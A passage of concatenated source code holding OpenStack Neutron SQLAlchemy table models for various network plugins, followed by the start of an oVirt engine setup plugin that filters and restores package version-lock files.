qos_desc = sa.Column(sa.String(255))
#neutron/plugins/cisco/db/network_models_v2.py
class Credential(BASEV2):
__tablename__ = 'cisco_credentials'
credential_id = sa.Column(sa.String(255))
credential_name = sa.Column(sa.String(255), primary_key=True)
user_name = sa.Column(sa.String(255))
password = sa.Column(sa.String(255))
type = sa.Column(sa.String(255))
#neutron/plugins/cisco/db/network_models_v2.py
class ProviderNetwork(BASEV2):
__tablename__ = 'cisco_provider_networks'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
network_type = sa.Column(sa.String(255), nullable=False)
segmentation_id = sa.Column(sa.Integer, nullable=False)
#neutron/plugins/cisco/db/nexus_models_v2.py
#class was renamed from NexusPortBinding to CiscoNexusPortBinding
class CiscoNexusPortBinding(BASEV2):
__tablename__ = "cisco_nexusport_bindings"
id = sa.Column(sa.Integer, primary_key=True, autoincrement=True)
port_id = sa.Column(sa.String(255))
vlan_id = sa.Column(sa.Integer, nullable=False)
switch_ip = sa.Column(sa.String(255), nullable=False)
instance_id = sa.Column(sa.String(255), nullable=False)
#neutron/plugins/hyperv/model.py
#class was renamed from VlanAllocation to HyperVVlanAllocation
class HyperVVlanAllocation(BASEV2):
__tablename__ = 'hyperv_vlan_allocations'
physical_network = sa.Column(sa.String(64),
nullable=False,
primary_key=True)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
#neutron/plugins/hyperv/model.py
#class was renamed from NetworkBinding to HyperVNetworkBinding
class HyperVNetworkBinding(BASEV2):
__tablename__ = 'hyperv_network_bindings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
network_type = sa.Column(sa.String(32), nullable=False)
physical_network = sa.Column(sa.String(64))
segmentation_id = sa.Column(sa.Integer)
#neutron/plugins/linuxbridge/db/l2network_models_v2.py
class NetworkState(BASEV2):
__tablename__ = 'network_states'
physical_network = sa.Column(sa.String(64), nullable=False,
primary_key=True)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
#neutron/plugins/linuxbridge/db/l2network_models_v2.py
class NetworkBinding(BASEV2):
__tablename__ = 'network_bindings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
physical_network = sa.Column(sa.String(64))
vlan_id = sa.Column(sa.Integer, nullable=False)
#neutron/plugins/metaplugin/meta_models_v2.py
class NetworkFlavor(BASEV2):
flavor = sa.Column(sa.String(255))
network_id = sa.Column(sa.String(36), sa.ForeignKey('networks.id',
ondelete="CASCADE"),
primary_key=True)
#neutron/plugins/metaplugin/meta_models_v2.py
class RouterFlavor(BASEV2):
flavor = sa.Column(sa.String(255))
router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id',
ondelete="CASCADE"),
primary_key=True)
#neutron/plugins/ml2/drivers/brocade/db/models.py
class ML2_BrocadeNetwork(BASEV2, HasId,
HasTenant):
vlan = sa.Column(sa.String(10))
segment_id = sa.Column(sa.String(36))
network_type = sa.Column(sa.String(10))
#neutron/plugins/ml2/drivers/brocade/db/models.py
class ML2_BrocadePort(BASEV2, HasId,
HasTenant):
network_id = sa.Column(sa.String(36),
sa.ForeignKey("ml2_brocadenetworks.id"),
nullable=False)
admin_state_up = sa.Column(sa.Boolean, nullable=False)
physical_interface = sa.Column(sa.String(36))
vlan_id = sa.Column(sa.String(36))
#neutron/plugins/ml2/drivers/cisco/apic/apic_model.py
class NetworkEPG(BASEV2):
__tablename__ = 'cisco_ml2_apic_epgs'
network_id = sa.Column(sa.String(255), nullable=False, primary_key=True)
epg_id = sa.Column(sa.String(64), nullable=False)
segmentation_id = sa.Column(sa.String(64), nullable=False)
provider = sa.Column(sa.Boolean, default=False,
server_default=sa.sql.false(), nullable=False)
#neutron/plugins/ml2/drivers/cisco/apic/apic_model.py
class PortProfile(BASEV2):
__tablename__ = 'cisco_ml2_apic_port_profiles'
node_id = sa.Column(sa.String(255), nullable=False, primary_key=True)
profile_id = sa.Column(sa.String(64), nullable=False)
hpselc_id = sa.Column(sa.String(64), nullable=False)
module = sa.Column(sa.String(10), nullable=False)
from_port = sa.Column(sa.Integer(), nullable=False)
to_port = sa.Column(sa.Integer(), nullable=False)
#neutron/plugins/ml2/drivers/cisco/apic/apic_model.py
class TenantContract(BASEV2, HasTenant):
__tablename__ = 'cisco_ml2_apic_contracts'
__table_args__ = (sa.PrimaryKeyConstraint('tenant_id'),)
contract_id = sa.Column(sa.String(64), nullable=False)
filter_id = sa.Column(sa.String(64), nullable=False)
#neutron/plugins/ml2/drivers/cisco/nexus/nexus_models_v2.py
#class was renamed from NexusPortBinding to CiscoMl2NexusPortBinding
class CiscoMl2NexusPortBinding(BASEV2):
__tablename__ = "cisco_ml2_nexusport_bindings"
binding_id = sa.Column(sa.Integer, primary_key=True, autoincrement=True)
port_id = sa.Column(sa.String(255))
vlan_id = sa.Column(sa.Integer, nullable=False)
switch_ip = sa.Column(sa.String(255))
instance_id = sa.Column(sa.String(255))
#neutron/plugins/ml2/drivers/mech_arista/db.py
class AristaProvisionedNets(BASEV2, HasId,
HasTenant):
__tablename__ = 'arista_provisioned_nets'
network_id = sa.Column(sa.String(UUID_LEN))
segmentation_id = sa.Column(sa.Integer)
#neutron/plugins/ml2/drivers/mech_arista/db.py
class AristaProvisionedVms(BASEV2, HasId,
HasTenant):
__tablename__ = 'arista_provisioned_vms'
vm_id = sa.Column(sa.String(STR_LEN))
host_id = sa.Column(sa.String(STR_LEN))
port_id = sa.Column(sa.String(UUID_LEN))
network_id = sa.Column(sa.String(UUID_LEN))
#neutron/plugins/ml2/drivers/mech_arista/db.py
class AristaProvisionedTenants(BASEV2, HasId,
HasTenant):
__tablename__ = 'arista_provisioned_tenants'
#neutron/plugins/ml2/drivers/type_flat.py
class FlatAllocation(BASEV2):
__tablename__ = 'ml2_flat_allocations'
physical_network = sa.Column(sa.String(64), nullable=False,
primary_key=True)
#neutron/plugins/ml2/drivers/type_gre.py
class GreAllocation(BASEV2):
__tablename__ = 'ml2_gre_allocations'
gre_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False, default=False,
server_default=sa.sql.false())
#neutron/plugins/ml2/drivers/type_gre.py
class GreEndpoints(BASEV2):
__tablename__ = 'ml2_gre_endpoints'
ip_address = sa.Column(sa.String(64), primary_key=True)
#neutron/plugins/ml2/drivers/type_vlan.py
#class was renamed from VlanAllocation to Ml2VlanAllocation
class Ml2VlanAllocation(BASEV2):
__tablename__ = 'ml2_vlan_allocations'
physical_network = sa.Column(sa.String(64), nullable=False,
primary_key=True)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
#neutron/plugins/ml2/drivers/type_vxlan.py
class VxlanAllocation(BASEV2):
__tablename__ = 'ml2_vxlan_allocations'
vxlan_vni = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False, default=False,
server_default=sa.sql.false())
#neutron/plugins/ml2/drivers/type_vxlan.py
class VxlanEndpoints(BASEV2):
__tablename__ = 'ml2_vxlan_endpoints'
ip_address = sa.Column(sa.String(64), primary_key=True)
udp_port = sa.Column(sa.Integer, primary_key=True, nullable=False,
autoincrement=False)
#neutron/plugins/ml2/models.py
class NetworkSegment(BASEV2, HasId):
__tablename__ = 'ml2_network_segments'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
nullable=False)
network_type = sa.Column(sa.String(32), nullable=False)
physical_network = sa.Column(sa.String(64))
segmentation_id = sa.Column(sa.Integer)
#neutron/plugins/ml2/models.py
class PortBinding(BASEV2):
__tablename__ = 'ml2_port_bindings'
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
host = sa.Column(sa.String(255), nullable=False, default='',
server_default='')
vnic_type = sa.Column(sa.String(64), nullable=False,
default=VNIC_NORMAL, server_default=VNIC_NORMAL)
profile = sa.Column(sa.String(BINDING_PROFILE_LEN), nullable=False,
default='', server_default='')
vif_type = sa.Column(sa.String(64), nullable=False)
vif_details = sa.Column(sa.String(4095), nullable=False, default='',
server_default='')
driver = sa.Column(sa.String(64))
segment = sa.Column(sa.String(36),
sa.ForeignKey('ml2_network_segments.id',
ondelete="SET NULL"))
port = orm.relationship(
Port,
backref=orm.backref("port_binding",
lazy='joined', uselist=False,
cascade='delete'))
#neutron/plugins/mlnx/db/mlnx_models_v2.py
class SegmentationIdAllocation(BASEV2):
__tablename__ = 'segmentation_id_allocation'
physical_network = sa.Column(sa.String(64), nullable=False,
primary_key=True)
segmentation_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False, default=False,
server_default=sa.sql.false())
#neutron/plugins/mlnx/db/mlnx_models_v2.py
#class was renamed from NetworkBinding to MlnxNetworkBinding
class MlnxNetworkBinding(BASEV2):
__tablename__ = 'mlnx_network_bindings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
network_type = sa.Column(sa.String(32), nullable=False)
physical_network = sa.Column(sa.String(64))
segmentation_id = sa.Column(sa.Integer, nullable=False)
#neutron/plugins/mlnx/db/mlnx_models_v2.py
class PortProfileBinding(BASEV2):
__tablename__ = 'port_profile'
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
vnic_type = sa.Column(sa.String(32), nullable=False)
#neutron/plugins/nec/db/models.py
class OFCId(object):
ofc_id = sa.Column(sa.String(255), unique=True, nullable=False)
#neutron/plugins/nec/db/models.py
class NeutronId(object):
neutron_id = sa.Column(sa.String(36), primary_key=True)
#neutron/plugins/nec/db/models.py
class OFCTenantMapping(BASEV2, NeutronId, OFCId):
"""Represents a Tenant on OpenFlow Network/Controller."""
#neutron/plugins/nec/db/models.py
class OFCNetworkMapping(BASEV2, NeutronId, OFCId):
"""Represents a Network on OpenFlow Network/Controller."""
#neutron/plugins/nec/db/models.py
class OFCPortMapping(BASEV2, NeutronId, OFCId):
"""Represents a Port on OpenFlow Network/Controller."""
#neutron/plugins/nec/db/models.py
class OFCRouterMapping(BASEV2, NeutronId, OFCId):
"""Represents a router on OpenFlow Network/Controller."""
#neutron/plugins/nec/db/models.py
class OFCFilterMapping(BASEV2, NeutronId, OFCId):
"""Represents a Filter on OpenFlow Network/Controller."""
#neutron/plugins/nec/db/models.py
class PortInfo(BASEV2):
id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
datapath_id = sa.Column(sa.String(36), nullable=False)
port_no = sa.Column(sa.Integer, nullable=False)
vlan_id = sa.Column(sa.Integer, nullable=False)
mac = sa.Column(sa.String(32), nullable=False)
port = orm.relationship(
Port,
backref=orm.backref("portinfo",
lazy='joined', uselist=False,
cascade='delete'))
#neutron/plugins/nec/db/packetfilter.py
class PacketFilter(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
nullable=False)
priority = sa.Column(sa.Integer, nullable=False)
action = sa.Column(sa.String(16), nullable=False)
in_port = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
nullable=True)
src_mac = sa.Column(sa.String(32), nullable=False)
dst_mac = sa.Column(sa.String(32), nullable=False)
eth_type = sa.Column(sa.Integer, nullable=False)
src_cidr = sa.Column(sa.String(64), nullable=False)
dst_cidr = sa.Column(sa.String(64), nullable=False)
protocol = sa.Column(sa.String(16), nullable=False)
src_port = sa.Column(sa.Integer, nullable=False)
dst_port = sa.Column(sa.Integer, nullable=False)
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
status = sa.Column(sa.String(16), nullable=False)
network = orm.relationship(
Network,
backref=orm.backref('packetfilters', lazy='joined', cascade='delete'),
uselist=False)
in_port_ref = orm.relationship(
Port,
backref=orm.backref('packetfilters', lazy='joined', cascade='delete'),
primaryjoin="Port.id==PacketFilter.in_port",
uselist=False)
#neutron/plugins/nec/db/router.py
class RouterProvider(BASEV2):
provider = sa.Column(sa.String(255))
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id', ondelete="CASCADE"),
primary_key=True)
router = orm.relationship(Router, uselist=False,
backref=orm.backref('provider', uselist=False,
lazy='joined',
cascade='delete'))
#neutron/plugins/nuage/nuage_models.py
class NetPartition(BASEV2, HasId):
__tablename__ = 'nuage_net_partitions'
name = sa.Column(sa.String(64))
l3dom_tmplt_id = sa.Column(sa.String(36))
l2dom_tmplt_id = sa.Column(sa.String(36))
#neutron/plugins/nuage/nuage_models.py
class NetPartitionRouter(BASEV2):
__tablename__ = "nuage_net_partition_router_mapping"
net_partition_id = sa.Column(sa.String(36),
sa.ForeignKey('nuage_net_partitions.id',
ondelete="CASCADE"),
primary_key=True)
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id', ondelete="CASCADE"),
primary_key=True)
nuage_router_id = sa.Column(sa.String(36))
#neutron/plugins/nuage/nuage_models.py
class RouterZone(BASEV2):
__tablename__ = "nuage_router_zone_mapping"
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id', ondelete="CASCADE"),
primary_key=True)
nuage_zone_id = sa.Column(sa.String(36))
nuage_user_id = sa.Column(sa.String(36))
nuage_group_id = sa.Column(sa.String(36))
#neutron/plugins/nuage/nuage_models.py
class SubnetL2Domain(BASEV2):
__tablename__ = 'nuage_subnet_l2dom_mapping'
subnet_id = sa.Column(sa.String(36),
sa.ForeignKey('subnets.id', ondelete="CASCADE"),
primary_key=True)
net_partition_id = sa.Column(sa.String(36),
sa.ForeignKey('nuage_net_partitions.id',
ondelete="CASCADE"))
nuage_subnet_id = sa.Column(sa.String(36))
nuage_l2dom_tmplt_id = sa.Column(sa.String(36))
nuage_user_id = sa.Column(sa.String(36))
nuage_group_id = sa.Column(sa.String(36))
#neutron/plugins/nuage/nuage_models.py
class PortVPortMapping(BASEV2):
__tablename__ = 'nuage_port_mapping'
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
nuage_vport_id = sa.Column(sa.String(36))
nuage_vif_id = sa.Column(sa.String(36))
static_ip = sa.Column(sa.Boolean())
#neutron/plugins/nuage/nuage_models.py
class RouterRoutesMapping(BASEV2, Route):
__tablename__ = 'nuage_routerroutes_mapping'
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id',
ondelete="CASCADE"),
primary_key=True,
nullable=False)
nuage_route_id = sa.Column(sa.String(36))
#neutron/plugins/nuage/nuage_models.py
class FloatingIPPoolMapping(BASEV2):
__tablename__ = "nuage_floatingip_pool_mapping"
fip_pool_id = sa.Column(sa.String(36), primary_key=True)
net_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"))
router_id = sa.Column(sa.String(36))
#neutron/plugins/nuage/nuage_models.py
class FloatingIPMapping(BASEV2):
__tablename__ = 'nuage_floatingip_mapping'
fip_id = sa.Column(sa.String(36),
sa.ForeignKey('floatingips.id',
ondelete="CASCADE"),
primary_key=True)
router_id = sa.Column(sa.String(36))
nuage_fip_id = sa.Column(sa.String(36))
#neutron/plugins/openvswitch/ovs_models_v2.py
#class was renamed from VlanAllocation to OvsVlanAllocation
class OvsVlanAllocation(BASEV2):
__tablename__ = 'ovs_vlan_allocations'
physical_network = sa.Column(sa.String(64),
nullable=False,
primary_key=True)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
#neutron/plugins/openvswitch/ovs_models_v2.py
class TunnelAllocation(BASEV2):
__tablename__ = 'ovs_tunnel_allocations'
tunnel_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
#neutron/plugins/openvswitch/ovs_models_v2.py
#class was renamed from NetworkBinding to OvsNetworkBinding
class OvsNetworkBinding(BASEV2):
__tablename__ = 'ovs_network_bindings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
# 'gre', 'vlan', 'flat', 'local'
network_type = sa.Column(sa.String(32), nullable=False)
physical_network = sa.Column(sa.String(64))
segmentation_id = sa.Column(sa.Integer) # tunnel_id or vlan_id
network = orm.relationship(
Network,
backref=orm.backref("binding", lazy='joined',
uselist=False, cascade='delete'))
#neutron/plugins/openvswitch/ovs_models_v2.py
class TunnelEndpoint(BASEV2):
__tablename__ = 'ovs_tunnel_endpoints'
__table_args__ = (
schema.UniqueConstraint('id', name='uniq_ovs_tunnel_endpoints0id'),
BASEV2.__table_args__,
)
ip_address = sa.Column(sa.String(64), primary_key=True)
id = sa.Column(sa.Integer, nullable=False)
#neutron/plugins/ryu/db/models_v2.py
class TunnelKeyLast(BASEV2):
last_key = sa.Column(sa.Integer, primary_key=True)
#neutron/plugins/ryu/db/models_v2.py
class TunnelKey(BASEV2):
network_id = sa.Column(sa.String(36), sa.ForeignKey("networks.id"),
nullable=False)
tunnel_key = sa.Column(sa.Integer, primary_key=True,
nullable=False, autoincrement=False)
#neutron/plugins/vmware/dbexts/lsn_db.py
class LsnPort(BASEV2):
__tablename__ = 'lsn_port'
lsn_port_id = sa.Column(sa.String(36), primary_key=True)
lsn_id = sa.Column(sa.String(36), sa.ForeignKey('lsn.lsn_id',
ondelete="CASCADE"),
nullable=False)
sub_id = sa.Column(sa.String(36), nullable=False, unique=True)
mac_addr = sa.Column(sa.String(32), nullable=False, unique=True)
#neutron/plugins/vmware/dbexts/lsn_db.py
class Lsn(BASEV2):
__tablename__ = 'lsn'
lsn_id = sa.Column(sa.String(36), primary_key=True)
net_id = sa.Column(sa.String(36), nullable=False)
#neutron/plugins/vmware/dbexts/maclearning.py
class MacLearningState(BASEV2):
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
mac_learning_enabled = sa.Column(sa.Boolean(), nullable=False)
port = orm.relationship(
Port,
backref=orm.backref("mac_learning_state", lazy='joined',
uselist=False, cascade='delete'))
#neutron/plugins/vmware/dbexts/models.py
class TzNetworkBinding(BASEV2):
__tablename__ = 'tz_network_bindings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
binding_type = sa.Column(sa.Enum('flat', 'vlan', 'stt', 'gre', 'l3_ext',
name='tz_network_bindings_binding_type'),
nullable=False, primary_key=True)
phy_uuid = sa.Column(sa.String(36), primary_key=True, nullable=True)
vlan_id = sa.Column(sa.Integer, primary_key=True, nullable=True,
autoincrement=False)
#neutron/plugins/vmware/dbexts/models.py
class NeutronNsxNetworkMapping(BASEV2):
__tablename__ = 'neutron_nsx_network_mappings'
neutron_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete='CASCADE'),
primary_key=True)
nsx_id = sa.Column(sa.String(36), primary_key=True)
#neutron/plugins/vmware/dbexts/models.py
class NeutronNsxSecurityGroupMapping(BASEV2):
__tablename__ = 'neutron_nsx_security_group_mappings'
neutron_id = sa.Column(sa.String(36),
sa.ForeignKey('securitygroups.id',
ondelete="CASCADE"),
primary_key=True)
nsx_id = sa.Column(sa.String(36), primary_key=True)
#neutron/plugins/vmware/dbexts/models.py
class NeutronNsxPortMapping(BASEV2):
__tablename__ = 'neutron_nsx_port_mappings'
neutron_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
nsx_switch_id = sa.Column(sa.String(36))
nsx_port_id = sa.Column(sa.String(36), nullable=False)
#neutron/plugins/vmware/dbexts/models.py
class NeutronNsxRouterMapping(BASEV2):
__tablename__ = 'neutron_nsx_router_mappings'
neutron_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id', ondelete='CASCADE'),
primary_key=True)
nsx_id = sa.Column(sa.String(36))
#neutron/plugins/vmware/dbexts/models.py
class MultiProviderNetworks(BASEV2):
__tablename__ = 'multi_provider_networks'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
#neutron/plugins/vmware/dbexts/models.py
class NSXRouterExtAttributes(BASEV2):
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id', ondelete="CASCADE"),
primary_key=True)
distributed = sa.Column(sa.Boolean, default=False,
server_default=sa.sql.false(), nullable=False)
service_router = sa.Column(sa.Boolean, default=False,
server_default=sa.sql.false(), nullable=False)
router = orm.relationship(
Router,
backref=orm.backref("nsx_attributes", lazy='joined',
uselist=False, cascade='delete'))
#neutron/plugins/vmware/dbexts/networkgw_db.py
class NetworkConnection(BASEV2, HasTenant):
network_gateway_id = sa.Column(sa.String(36),
sa.ForeignKey('networkgateways.id',
ondelete='CASCADE'))
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete='CASCADE'))
segmentation_type = sa.Column(
sa.Enum('flat', 'vlan',
name='networkconnections_segmentation_type'))
segmentation_id = sa.Column(sa.Integer)
__table_args__ = (sa.UniqueConstraint(network_gateway_id,
segmentation_type,
segmentation_id),)
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete='CASCADE'),
primary_key=True)
#neutron/plugins/vmware/dbexts/networkgw_db.py
class NetworkGatewayDeviceReference(BASEV2):
id = sa.Column(sa.String(36), primary_key=True)
network_gateway_id = sa.Column(sa.String(36),
sa.ForeignKey('networkgateways.id',
ondelete='CASCADE'),
primary_key=True)
interface_name = sa.Column(sa.String(64), primary_key=True)
#neutron/plugins/vmware/dbexts/networkgw_db.py
class NetworkGatewayDevice(BASEV2, HasId,
HasTenant):
nsx_id = sa.Column(sa.String(36))
# Optional name for the gateway device
name = sa.Column(sa.String(255))
# Transport connector type. Not using enum as range of
# connector types might vary with backend version
connector_type = sa.Column(sa.String(10))
# Transport connector IP Address
connector_ip = sa.Column(sa.String(64))
# operational status
status = sa.Column(sa.String(16))
#neutron/plugins/vmware/dbexts/networkgw_db.py
class NetworkGateway(BASEV2, HasId,
HasTenant):
name = sa.Column(sa.String(255))
# Tenant id is nullable for this resource
tenant_id = sa.Column(sa.String(36))
default = sa.Column(sa.Boolean())
devices = orm.relationship(NetworkGatewayDeviceReference,
backref='networkgateways',
cascade='all,delete')
network_connections = orm.relationship(NetworkConnection, lazy='joined')
#neutron/plugins/vmware/dbexts/qos_db.py
class QoSQueue(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
default = sa.Column(sa.Boolean, default=False,
server_default=sa.sql.false())
min = sa.Column(sa.Integer, nullable=False)
max = sa.Column(sa.Integer, nullable=True)
qos_marking = sa.Column(sa.Enum('untrusted', 'trusted',
name='qosqueues_qos_marking'))
dscp = sa.Column(sa.Integer)
#neutron/plugins/vmware/dbexts/qos_db.py
class PortQueueMapping(BASEV2):
port_id = sa.Column(sa.String(36),
sa.ForeignKey("ports.id", ondelete="CASCADE"),
primary_key=True)
queue_id = sa.Column(sa.String(36), sa.ForeignKey("qosqueues.id"),
primary_key=True)
# Add a relationship to the Port model adding a backref which will
# allow SQLAlchemy for eagerly load the queue binding
port = orm.relationship(
Port,
backref=orm.backref("qos_queue", uselist=False,
cascade='delete', lazy='joined'))
#neutron/plugins/vmware/dbexts/qos_db.py
class NetworkQueueMapping(BASEV2):
network_id = sa.Column(sa.String(36),
sa.ForeignKey("networks.id", ondelete="CASCADE"),
primary_key=True)
queue_id = sa.Column(sa.String(36), sa.ForeignKey("qosqueues.id",
ondelete="CASCADE"))
# Add a relationship to the Network model adding a backref which will
# allow SQLAlcremy for eagerly load the queue binding
network = orm.relationship(
Network,
backref=orm.backref("qos_queue", uselist=False,
cascade='delete', lazy='joined'))
#neutron/plugins/vmware/dbexts/vcns_models.py
class VcnsRouterBinding(BASEV2, HasStatusDescription):
__tablename__ = 'vcns_router_bindings'
# no sa.ForeignKey to routers.id because for now, a router can be removed
# from routers when delete_router is executed, but the binding is only
# removed after the Edge is deleted
router_id = sa.Column(sa.String(36),
primary_key=True)
edge_id = sa.Column(sa.String(16),
nullable=True)
lswitch_id = sa.Column(sa.String(36),
nullable=False)
#neutron/plugins/vmware/dbexts/vcns_models.py
class VcnsEdgeFirewallRuleBinding(BASEV2):
__tablename__ = 'vcns_firewall_rule_bindings'
rule_id = sa.Column(sa.String(36),
sa.ForeignKey("firewall_rules.id"),
primary_key=True)
edge_id = sa.Column(sa.String(36), primary_key=True)
rule_vseid = sa.Column(sa.String(36))
#neutron/plugins/vmware/dbexts/vcns_models.py
class VcnsEdgePoolBinding(BASEV2):
__tablename__ = 'vcns_edge_pool_bindings'
pool_id = sa.Column(sa.String(36),
sa.ForeignKey("pools.id", ondelete="CASCADE"),
primary_key=True)
edge_id = sa.Column(sa.String(36), primary_key=True)
pool_vseid = sa.Column(sa.String(36))
#neutron/plugins/vmware/dbexts/vcns_models.py
class VcnsEdgeVipBinding(BASEV2):
__tablename__ = 'vcns_edge_vip_bindings'
vip_id = sa.Column(sa.String(36),
sa.ForeignKey("vips.id", ondelete="CASCADE"),
primary_key=True)
edge_id = sa.Column(sa.String(36))
vip_vseid = sa.Column(sa.String(36))
app_profileid = sa.Column(sa.String(36))
#neutron/plugins/vmware/dbexts/vcns_models.py
class VcnsEdgeMonitorBinding(BASEV2):
__tablename__ = 'vcns_edge_monitor_bindings'
monitor_id = sa.Column(sa.String(36),
sa.ForeignKey("healthmonitors.id",
ondelete="CASCADE"),
primary_key=True)
edge_id = sa.Column(sa.String(36), primary_key=True)
monitor_vseid = sa.Column(sa.String(36))
#neutron/services/loadbalancer/agent_scheduler.py
class PoolLoadbalancerAgentBinding(BASEV2):
pool_id = sa.Column(sa.String(36),
sa.ForeignKey("pools.id", ondelete='CASCADE'),
primary_key=True)
agent = orm.relation(Agent)
agent_id = sa.Column(sa.String(36), sa.ForeignKey("agents.id",
ondelete='CASCADE'),
nullable=False)
#neutron/services/loadbalancer/drivers/embrane/models.py
class PoolPort(BASEV2):
__tablename__ = 'embrane_pool_port'
pool_id = sa.Column(sa.String(36), sa.ForeignKey('pools.id'),
primary_key=True)
port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id'),
nullable=False)
#neutron/services/vpn/service_drivers/cisco_csr_db.py
class IdentifierMap(BASEV2, HasTenant):
__tablename__ = 'cisco_csr_identifier_map'
ipsec_site_conn_id = sa.Column(sa.String(64),
sa.ForeignKey('ipsec_site_connections.id',
ondelete="CASCADE"),
primary_key=True)
csr_tunnel_id = sa.Column(sa.Integer, nullable=False)
csr_ike_policy_id = sa.Column(sa.Integer, nullable=False)
csr_ipsec_policy_id = sa.Column(sa.Integer, nullable=False)
def get_metadata():
return BASEV2.metadata
| apache-2.0 |
walteryang47/ovirt-engine | packaging/setup/plugins/ovirt-engine-setup/ovirt-engine-common/distro-rpm/packages.py | 6 | 17845 | #
# ovirt-engine-setup -- ovirt engine setup
# Copyright (C) 2013-2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Package upgrade plugin.
"""
import datetime
import gettext
import os
import platform
from otopi import constants as otopicons
from otopi import plugin, transaction, util
from ovirt_engine_setup import constants as osetupcons
from ovirt_setup_lib import dialog
from ovirt_engine_setup import util as osetuputil
def _(m):
return gettext.dgettext(message=m, domain='ovirt-engine-setup')
@util.export
class Plugin(plugin.PluginBase):
"""
Package upgrade plugin.
"""
class VersionLockTransaction(transaction.TransactionElement):
"""
version lock transaction element.
Not that this is real transaction, but we need to
rollback/commit same as packager.
We cannot actually prepare the transaction at preparation
because new packages are not installed.
But we must restore file as we do not know what packages
were locked at previous version.
"""
_VERSIONLOCK_LIST_FILES = (
osetupcons.FileLocations.OVIRT_ENGINE_YUM_VERSIONLOCK,
osetupcons.FileLocations.OVIRT_ENGINE_DNF_VERSIONLOCK,
)
def _filterVersionLock(self):
modified = {}
content = {}
for versionlock_list_file in self._VERSIONLOCK_LIST_FILES:
modified[versionlock_list_file] = False
content[versionlock_list_file] = []
if os.path.exists(versionlock_list_file):
with open(versionlock_list_file, 'r') as f:
for line in f.read().splitlines():
found = False
for pattern in self.environment[
osetupcons.RPMDistroEnv.VERSION_LOCK_FILTER
]:
if line.find(pattern) != -1:
found = True
break
if not found:
content[versionlock_list_file].append(line)
else:
modified[versionlock_list_file] = True
return (modified, content)
@property
def environment(self):
return self._parent.environment
def __init__(self, parent):
self._parent = parent
self._backup = {}
def __str__(self):
return _("Version Lock Transaction")
def prepare(self):
if not self._parent._enabled:
return
modified, content = self._filterVersionLock()
for versionlock_list_file in self._VERSIONLOCK_LIST_FILES:
if modified[versionlock_list_file]:
self._backup[versionlock_list_file] = '%s.%s' % (
versionlock_list_file,
datetime.datetime.now().strftime('%Y%m%d%H%M%S'),
)
os.rename(
versionlock_list_file,
self._backup[versionlock_list_file],
)
with open(
versionlock_list_file,
'w'
) as f:
f.write(
'\n'.join(content[versionlock_list_file]) + '\n'
)
def abort(self):
for versionlock_list_file in self._VERSIONLOCK_LIST_FILES:
if (
versionlock_list_file in self._backup and
os.path.exists(self._backup[versionlock_list_file])
):
